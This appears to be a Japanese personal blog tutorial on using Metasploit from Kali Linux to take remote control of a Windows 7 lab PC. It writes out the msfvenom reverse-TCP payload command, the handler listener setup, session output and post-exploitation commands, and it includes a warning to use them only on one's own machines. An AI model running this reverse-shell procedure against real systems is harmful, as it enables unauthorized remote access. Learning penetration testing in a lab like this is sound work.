Metasploitを使ってWindows7を遠隔操作してみた

明けましておめでとうございます。今年もよろしくお願いします!

30代未経験ネットワークエンジニアのshin@セキュリティエンジニアになるため勉強中です。

新年最初は、Metasploitを使ってWindows7を遠隔操作してみたと思います。

Metasploitとは、ペネトレーションテストや脆弱性診断で使用されるツールですので、自分の管理しているPCにのみ使用してください。
※Kali Linuxを使用します。もちろん悪用厳禁です!

目次

流れ

  1. Kali Linuxでリバースシェルを行うためのEXEを作成
  2. Metasploitでシェルを待ち受ける
  3. Windows7でEXEを実行
  4. Kali LinuxでWindows7の情報を取得

今回の環境や、構成などは次のようになります。

環境

・ターゲットPC(Windows7)
・攻撃用PC(Kali Linux)

構成

・Kali Linux
 IPアドレス:192.168.89.169

・Windows7
 IPアドレス:192.168.89.157

今回の目的

ターゲットPCをMetasploitを使って攻撃して、ターゲットPCの「ipconfig」コマンドをKali Linuxで表示することまでやります。

それでは、実際にやっていきましょう。

手順

1.Kali Linuxの左のショーカットから「端末」を選択

2.Metasploitを起動するため、次のコマンドを実行

・msfconsole

3.ペイロードを作成するため、次のコマンドを実行(EXEを作成)

・msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.89.169 -f exe -o /root/windows7_test.exe

※LHOST:Kali LinuxのIPアドレスを入力

↓ 実行後に表示された結果

[*] exec: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.89.169 -f exe -o /root/windows7_test.exe[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload[-] No arch selected, selecting arch: x86 from the payloadNo encoder or badchars specified, outputting raw payloadPayload size: 341 bytesFinal size of exe file: 73802 bytesSaved as: /root/windows7_test.exe

4.作成した、「windows7_test.exe」ファイルをWindows7へコピーします

5.Kali Linuxでリバースシェルを待ち受けるためのコマンドを実行

・use exploit/multi/handler
・set payload windows/meterpreter/reverse_tcp
・set LHOST 192.168.89.169

ここまで、設定できたら「show options」コマンドで設定が間違っていないかを確認します。

・show options

↓結果はこんな感じ

6.問題なければ、先にWindows7側で「windows7_test.exe」を実行します。
※順番は7番が先でも問題ありません。

7. 「exploit」コマンドを実行

・exploit

msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.89.169:4444
[*] Sending stage (179779 bytes) to 192.168.89.157
[*] Meterpreter session 1 opened (192.168.89.169:4444 -> 192.168.89.157:49159) at 2019-01-03 11:00:01 +0900

meterpreter >

8.「meterpreter>」が表示されていれば、Windows7とのセッションが確立しています。

※Windows7の「netstat」を前後で取得しました。
セッションが確立されていることが確認できます。

確立前

確立後

9.Windows7を遠隔操作してみます
Kali Liuxで以下のコマンドを入力してみましょう。

・getuid
・ls
・ifconfig


Windows7の現在のユーザが見れたり、カレントディレクトリ、IPアドレスの情報が確認できました。以上で、今回の目的を達成しましたのでこれで完了です。

補足

もしも、Windows7のコマンドプロンプトを表示したい場合は、「shell」と入力してみてください。
そうすると、普段使用しているコマンドプロンプト画面を表示することが出来ます。
元の状態に戻したい場合は、「exit」を入力

動画も取得しましのでよかったら是非見てください。

まとめ

今回は、Merasploitを使用して、Windows7のシェルを使用することが出来ました。
実際の攻撃とは違うと思いますが、少しでも参考になればと思います。

以上です。ありがとうございました。

今回の参考本です。
今回の内容よりも、もっと詳しいことが書いてあります。

よかったらシェアしてね!
  • URLをコピーしました!
  • URLをコピーしました!

この記事を書いた人

30歳未経験からネットワークエンジニアに転職し、運用→構築→設計の仕事をやってます。色んな機器(Cisco、YAMAHA、Fortigate、PaloAlto)を触らせてもらいとても楽しい仕事です!

現在は派遣にて主にCiscoを中心としたネットワーク設計~構築をしております。

また、2023年より副業で個人事業主や小規模企業からのパソコン設定~ネットワーク作業の仕事を請け負っておりますので、もしお困りの方がいましたらお気軽にお問い合わせください。

●今までの作業履歴
- パソコンの新旧入れ替え
- 拠点間のインターネットVPN接続(YAMAHA-Fortigate)

コメント

コメントする

目次